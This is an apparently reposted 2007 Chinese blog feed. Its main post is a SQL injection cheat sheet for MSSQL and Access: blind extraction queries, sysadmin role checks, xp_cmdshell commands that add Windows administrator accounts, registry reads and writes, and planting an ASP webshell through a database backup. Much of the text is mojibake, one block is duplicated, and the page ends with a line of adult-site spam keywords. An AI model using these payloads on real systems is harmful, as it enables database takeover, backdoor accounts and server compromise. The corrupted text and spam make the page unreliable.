脚本注射基础ZT

my — Wed, 13 Jun 2007 08:10:00 GMT

1.判断是否有注�?and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字�W?and [查询条�g] and ''='

4.搜烦时没�q��o(h��)参数�?and [查询条�g] and '%25'='

5.判断数据库系�l?
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字�D?;and (select Count(字段�? from 数据库名)>0 1.判断是否有注�?and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字�W?and [查询条�g] and ''='

4.搜烦时没�q��o(h��)参数�?and [查询条�g] and '%25'='

5.判断数据库系�l?
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字�D?;and (select Count(字段�? from 数据库名)>0

8.猜字�D�中记录长度 ;and (select top 1 len(字段�? from 数据库名)>0

9.(1)猜字�D늚�ascii��|��access�Q?
;and (select top 1 asc(mid(字段�?1,1)) from 数据库名)>0

(2)猜字�D늚�ascii��|��mssql�Q?
;and (select top 1 unicode(substring(字段�?1,1)) from 数据库名)>0

10.��试权限�l�构�Q�mssql�Q?
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--

11.��d��mssql和系�l�的帐户
;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列�?
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树(w��i)�?
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文�g的内�?

13.mssql中的存储�q�程

xp_regenumvalues 注册表根�? 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式�q�回所有键�?

xp_regread 栚w��,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' �q�回制定键的�?

xp_regwrite 栚w��,子键, 值名, 值类�? �?
值类型有2�U�REG_SZ 表示字符�?REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册�?

xp_regdeletevalue 栚w��,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个�?

xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除�?包括该键下所有�?

14.mssql的backup创徏webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前�pȝ��的连接用��h��不是sa
;and (select user_name())>0 爆当前系�l�的�q�接用户
;and (select db_name())>0 得到当前�q�接的数据库

my 2007-06-13 16:10 发表评论

js版的防范SQL注入式攻��M��码：(x��)

my — Thu, 31 May 2007 09:51:00 GMT

js版的防范SQL注入式攻��M��码：(x��)

my 2006-09-30 15:18 发表评论

JS验证E-mail

my — Thu, 14 Sep 2006 05:40:00 GMT

function isEmail(strEmail) { if (strEmail.search(/^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$/) != -1) return true; else alert("oh"); }

my 2006-09-14 13:40 发表评论

亚洲午夜免费视频,亚洲精品不卡视频,九月婷婷亚洲综合在线

脚本注射基础ZT

js版的防范SQL注入式攻��M��码：(x��)

JS验证E-mail